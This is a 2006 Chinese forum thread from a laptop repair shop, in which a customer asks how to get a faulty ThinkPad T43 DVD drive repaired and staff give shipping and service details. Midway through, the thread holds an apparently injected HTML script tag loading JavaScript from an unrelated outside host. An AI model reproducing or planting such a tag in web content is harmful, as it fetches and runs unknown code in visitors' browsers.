开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

T43-AT4 DVD-RW问题

今天5月份买的T43-AT4
现在发现光驱读盘有问题,普通盘(cd),在朋友机器上都可以读,在我这里都读不了
dvd只有一小部分可以正常读出来,好多dvd盘都是在朋友机器上正常可以读出,在我这里也读不了、

咨询,怎么送修?
可以单独送光驱吗?
如果送整机的话,能不能提供备机啊?
可以单独送修,不过单独送修比整机送修要慢得多
大概1个月
有备用机
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

哦,那我需要提供什么,还是找个相给传上来就ok是吧

怎么邮个你们?地址呢?
北京日坛路6号安琪商务中心501 杨阳收 13391929090

把机器底部照片贴到这里

光驱里面写上问题和你的地址等联系方式和你要说的话.
周末去你那里送修光驱,可以顺便帮我清理下风扇和键盘吧?
顺便可能还加个内存可以走贵宾价的呗?
原帖由 dreamerinfly 于 2006-11-30 20:51 发表
周末去你那里送修光驱,可以顺便帮我清理下风扇和键盘吧?
顺便可能还加个内存可以走贵宾价的呗?

没问题